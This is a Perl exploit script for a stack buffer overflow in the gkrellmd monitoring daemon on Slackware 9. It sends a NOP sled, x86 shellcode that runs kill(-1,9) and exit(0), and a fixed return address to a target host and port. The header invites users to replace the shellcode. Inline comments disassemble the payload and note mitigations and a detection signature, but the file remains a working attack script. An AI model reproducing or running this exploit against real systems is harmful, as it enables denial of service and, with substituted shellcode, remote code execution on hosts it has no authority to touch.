#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on slackware 9
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful(?) instead
# shellcode by me this time - wow this is badly formatted(again)
# the shellcode does kill(-1,9);exit(0) - change it

use IO::Socket;
# Argument check: both a host and a port are required, otherwise print the
# usage line and exit with -1.  Note that a truthiness test is used, so a
# port given as "0" would also be rejected here.
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm-linux.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }

# Raw payload bytes.  Per the header comment and the disassembly below this
# issues kill(-1, 9) followed by exit(0): every process the daemon's user is
# allowed to signal is killed, i.e. the effect on the target host is a
# denial of service rather than remote command execution.
$shellcode =    "\x31\xdb".
                "\x4b\x31\xc9\x83\xc1\x09\xb0\x25".
                "\xcd\x80\x31\xdb\xb0\x01\xcd\x80";
# Author's disassembly of the bytes above (x86 Linux syscall convention:
# %eax = syscall number, %ebx/%ecx = first/second argument).
#                xor %ebx, %ebx
#                dec %ebx
#                xor %ecx, %ecx
#                add $0x9, %ecx
#                movb $0x25, %al
#                int $0x80
#                xorl %ebx, %ebx
#                movb $0x1, %al
#                int $0x80

$host = $ARGV[0];
$port = $ARGV[1];
# Hard-coded little-endian stack address taken from the referenced advisory's
# Slackware 9 build of gkrellmd.  This is what makes the script fragile in
# practice: stack-address randomisation or a non-executable stack on the
# target defeats a fixed guess like this, which is the mitigation side of the
# bug besides upgrading gkrellmd past the affected version.
$ret = pack("l",0xbffff738);
$nop = "\x90";
# Overflow buffer: 134 NOP bytes, the payload, then the return address twice.
# From a detection standpoint, a run of 0x90 bytes of this length arriving
# right after the client banner is not something a genuine gkrellm client
# sends; it is a usable network signature for this attack.
$buf = $nop x 134 . $shellcode . $ret x 2;

# Plain TCP connection to the daemon.  Indirect-object syntax ("new Class")
# and the absence of strict/warnings are left as the author wrote them.
$socket = new IO::Socket::INET
(
Proto    => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

# The daemon expects a client version banner first; the overflow is sent as
# the second message.  Neither print is checked for success, so a dropped
# connection is not reported.
print $socket "gkrellm 2.1.10\n"; #tell the daemon which client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);
